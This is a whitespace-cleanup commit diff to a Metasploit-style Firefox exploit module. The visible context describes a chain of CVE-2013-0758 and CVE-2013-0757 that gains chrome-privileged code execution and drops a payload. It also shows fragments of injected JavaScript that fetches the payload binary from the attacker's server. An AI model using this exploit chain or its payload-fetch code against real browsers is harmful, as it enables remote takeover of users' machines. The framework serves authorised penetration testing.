Fix whitespace issues from msftidy.

jvennix-r7 · jvennix-r7 · commit aae47685632c · 2013-05-21T14:31:36.000-05:00
diff --git a/modules/exploits/multi/browser/firefox_svg_plugin.rb b/modules/exploits/multi/browser/firefox_svg_plugin.rb
@@ -19,21 +19,21 @@ def initialize(info = {})
 			'Description'    => %q{
 				This exploit gains remote code execution on Firefox 17.0.1 and all previous
 				versions, provided the user has installed Flash. No memory corruption is used.
-				
-				First, a Flash object is cloned into the anonymous content of the SVG 
+
+				First, a Flash object is cloned into the anonymous content of the SVG
 				"use" element in the <body> (CVE-2013-0758). From there, the Flash object
-				can navigate a child frame to a URL in the chrome:// scheme. 
-				
+				can navigate a child frame to a URL in the chrome:// scheme.
+
 				Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper
 				around the child frame's window reference and inject code into the chrome://
 				context. Once we have injection into the chrome execution context, we can write
 				the payload to disk, chmod it (if posix), and then execute.
-				
+
 				Note: Flash is used here to trigger the exploit but any Firefox plugin
 				with script access should be able to trigger it.
 			},
 			'License'        => MSF_LICENSE,
-			'Targets'        => [ 
+			'Targets'        => [
 				[ 'Windows x86 (Native Payload)',
 					{
 						'Platform' => 'win',
@@ -62,7 +62,7 @@ def initialize(info = {})
 			'References'     =>
 				[
 					['CVE', '2013-0758'],  # navigate a frame to a chrome:// URL
-					['CVE', '2013-0757'],  # bypass Chrome Object Wrapper to talk to chrome:// 
+					['CVE', '2013-0757'],  # bypass Chrome Object Wrapper to talk to chrome://
 					['URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-15.html'],
 					['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=813906']
 				],
@@ -132,7 +132,7 @@ def flash_trigger
 		@flash_trigger ||= File.read(swf_path)
 	end
 
-	# @return [String] the filename that will be used when the payload is dropped 
+	# @return [String] the filename that will be used when the payload is dropped
 	def payload_filename
 		if target.name == 'Windows x86 (Native Payload)'
 			"#{Rex::Text.rand_text_alphanumeric(8)}.exe"
@@ -146,7 +146,7 @@ def js_payload
 		%Q|
 		#{js_debug("Injection successful. JS executing with chrome privileges.")}
 		var x = new XMLHttpRequest;
-		x.overrideMimeType('text/plain; charset=x-user-defined');  
+		x.overrideMimeType('text/plain; charset=x-user-defined');
 		x.open('POST', '#{base_url}.bin', false);
 		x.send(null);
 		#{js_debug("'Payload: '+x.responseText", "")}
